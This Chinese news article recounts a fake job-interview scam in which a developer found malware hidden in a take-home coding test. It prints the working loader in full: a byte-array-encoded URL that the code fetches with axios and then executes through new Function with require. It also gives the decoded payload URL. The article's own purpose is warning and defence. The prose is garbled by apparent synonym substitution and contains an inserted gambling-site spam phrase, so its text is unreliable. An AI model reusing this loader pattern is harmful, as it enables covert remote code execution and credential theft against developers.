详情

整理 | 郑丽媛

"再晚 30 秒，我的加密钱包、形势源码和通盘个东谈主数据就全没了。"

回归那场用心想象的"口试骗局"，领有 8 年解放开采训戒的 David Dodda 于今仍心过剩悸。

近日，David Dodda   在技巧社区公开了我方碰到的新式开采者定向袭击：骗子伪装成一家区块链公司高管，邀请他进行资料口试，并以"编程测试"为饵植入坏心代码——若不是他在终末一刻骤然警醒，后果将不胜设思。

从"正规邀约"到"代码测试"：骗局的无缺铺垫

故事始于 LinkedIn 上一条看似野蛮的职责音问。

上周，David Dodda   的 LinkedIn 账号收到了一条来自" Symfa 公司首席区块链官 Mykola Yanchii "的私信。对方先容称，他们公司正在开采一款名为 BestCity   的房地产职责历程转型平台，当今正在招募兼职开采者，职责时辰生动，并与   David Dodda   的技巧栈很匹配。

出于职业民风，David 最初核查了   Mykola Yanchii   的身份，LinkedIn 上的对方资格相配"官方"：不仅有完整的职业资格，还标注了 Symfa 首席区块链官的头衔，账号领有 1000+ 简直好友结合，连日常发的动态齐带有那种"创业者式励志语录"的滋味……

总之即是：相配圭臬的、你在酬酢平台上看了十遍齐不会起疑惑的作风。

紧接着，David Dodda   又点开了   Symfa 公司的   LinkedIn   主页，相似趁火掠取：不仅有专科的品牌视觉想象，还展示了多名职工信息、公司业务先容，致使发布过多条"用区块链雠校房地产行业"的形势动态——看起来，全齐是一家当年运营的科技企业。

对   David Dodda   这样的解放开采者来说，这类邀约并不罕有——发件东谈主轨则、抒发专科，莫得建议不对理条件，仅商定通过线上口试进一步换取，这一切齐强化了"简直度"。

"我作念解放职业 8 年了，作念过 Web 应用、多样形势、代码审查也不少。我自觉得安全相识很强——至少我是这样觉得的。而此次看上去也很靠谱，是以我应承了电话口试。"

立时，Mykola Yanchi   以"提前评估技巧能力、检朴换取时辰"为由，发来了一个 Bitbucket 代码库集合，条件   David Dodda   在 30 分钟内完成 React/Node 项蓄意纰漏优化——这是技巧口试中最惯例的 " Take-Home   测试"，险些通盘开采者齐经历过。

David Dodda   点开代码库后发现：代码结构明晰，不仅有详备的 README 文档，还附带了相宜企业作风的宣传图，致使标注了需要优化的功能点，看起来即是一份很圭臬的口试测试题。

30 分钟的 "时辰陷坑"：差点跳过的安全红线

干系词，一个要害细节为后续的"危境操作"埋下伏笔——那时，距离商定的电话口试时辰仅剩   30   分钟，这对   David Dodda   而言时辰有些弥留。

"当年情况下，我会先把代码放到 Docker 容器里窒碍运行，证据莫得问题再初始优化。"他坦言，多年的开采训戒让他养成了"沙箱运行未知代码"的民风，但此次的迫切感打乱了节拍。

为了赶在口试前完成测试，David Dodda   成功在土产货环境打开了代码库，快速排查出几处昭着的语法   Bug，补充了缺失的 docker-compose 文献，还优化了部分冗余代码，通盘过程与惯例测试无异。

正大他准备输入" npm start "运行形势、向口试官展示遗弃时，多年的安全直观骤然 "警报响起"——"哪怕再急，运行未知代码前至少要扫一遍要害文献"。

抱着 "多花 1 分钟搜检" 的思法，David Dodda   将代码片断复制到了   Cursor AI 助手中，并发送了一条纰漏的查询指示：

" 在我运行这个智力之前，你能望望这个代码库中是否有任何可疑代码吗？比如读取不该读取的文献、拜谒加密钱包等 "。

没思到，AI   给出的响应让他短暂盗汗直流——在 server/controllers/userController.js 文献中，遮拦着一段高度污染的坏心代码：

//Get Cookie   ( async   ( ) => {       const   byteArray = [           104,   116,   116,   112,   115,   58,   47,   47,   97,   112,   105,   46,   110,   112,   111,   105,           110,   116,   46,   105,   111,   47,   50,   99,   52,   53,   56,   54,   49,   50,   51,   57,   99,   51,           98,   50,   48,   51,   49,   102,   98,   57       ] ;       const   uint8Array =   new   Uint8Array ( byteArray ) ;       const   decoder =   new   TextDecoder ( 'utf-8' ) ;      axios.get ( decoder.decode ( uint8Array ) )          .then ( response   =>  {               new   Function ( "require", response.data.model ) ( require ) ;          } )          .catch ( error   =>  { } ) ;   } ) ( ) ;

这段代码采选字节数组遮拦了一个资料 URL，通过 axios.get 得到坏心负载，并使用 JavaScript 的 Function 构造函数推行——最首要的是，这段代码高明地嵌在惩处功能之间，一朝拜谒到相应的 admin 路由，它就能以完整的做事器权限随时推行。

David Dodda 立即解码了阿谁字节数组：https://api.npoint.io/2c458612399c3b2031fb9。果不其然，这个   URL 指向的即是一个坏心 payload：一朝运行，将自动读取土产货文献系统、持取浏览器 Cookie、拜谒加密钱包客户端，致使得到环境变量中的数据库密码与分娩环境密钥——格外于向袭击者翻开了"数字家门"。

更可怕的是，当   David Dodda   在   24 小时后再次尝试拜谒该 URL 时，集合已全齐失效——也即是说，骗子为了幸免袭击印迹被跟踪，早已缔造了"自动就义"机制。

这一切齐显得那么专科，明显不是歪邪哪个垂钓邮件能作念到的。

"哪怕我平时再严慎，此次也差点中招"

过后   David Dodda   复盘了通盘事件，发现这场骗局的"专科性"远超野蛮网罗袭击，从感情领导到技巧伪装齐经过了用心想象，挑升针对开采者的职责民风缺陷。

举例，在感情层面，中枢在于诓骗了开采者的日常民风和感情预期：

●   熟习的口试历程：Take-Home 测试、形势结构、README ——这一切齐是常态化历程，容易让东谈主减轻警惕。

●   巨擘感：LinkedIn 上完整的高管档案和公司主页，裁汰了怀疑门槛。

●   时辰压力："请在口试前完成测试，以检朴聚议时辰"，催促闪开采者跳过安全搜检。

●   社会评释：公司页、职工列表、动态、粉丝网罗，一切看起来齐简直简直。

这些身分重复，让一直风光"安全相识很强"的 David Dodda 差点成功在主机推行了坏心代码。

而在技巧层面，骗子的伪装也险些"趁火掠取"：坏心代码莫得单独存放，而是镶嵌在当年的业务逻辑中，不仔细排查根底无法发现；采选字节数组污染而非明文 URL，规避基础的代码要害词检测；缔造 24 小时自动失效的 URL，大幅裁汰被溯源的风险。

"哪怕我平时再严慎，此次也差点中招。"

David Dodda   感触谈，骗子全齐摸清了开采者的职责场景：每天要处理大量 GitHub 仓库、npm 包、测试代码，很难对每一份文献齐进行全面的安全扫描，而"口试测试"的场景又进一步裁汰了感情防地——毕竟，"谁会怀疑一份来自正规公司的口试题里藏着坏心代码？"

好在，David Dodda   在按下回车前多思了一秒，把代码丢给 AI 搜检了一下。这短短的一秒，阻塞了一个可能导致分娩环境笔据袒露、个东谈主钱包被清空的祸害。而他在经历了此次骗局后，总结了几点对开采者的建议：

（1）要在窒碍环境运行未知代码：Docker、VM 齐行，毫不在主机成功运行。

（2）在运行前静态 / 动态分析：用 AI、静态分析器具或手动搜检进口点、require/exec、new Function、资料央求等时势。

（3）考据招聘方简直性：简直的 LinkedIn 而已与公司页面并不等于简直，要去考据招聘方配景（官网、域名、公司邮箱）而不是只看酬酢而已。

（4）对强制 / 催促保持怀疑：若是有东谈主催促你推行代码，那即是一个危境信号，更不要因此跳过安全历程。

最首要的是，养成怀疑的民风：哪怕是最熟习的器具和历程，也要有小数警醒。正如   David Dodda   所说，"下次当你收到一份‘看似无缺’的口试测试题时凯时体育游戏app平台，思思发生在我身上的这件事——多花   30   秒让   AI   搜检一下，你的钱包和密钥会感谢你的。"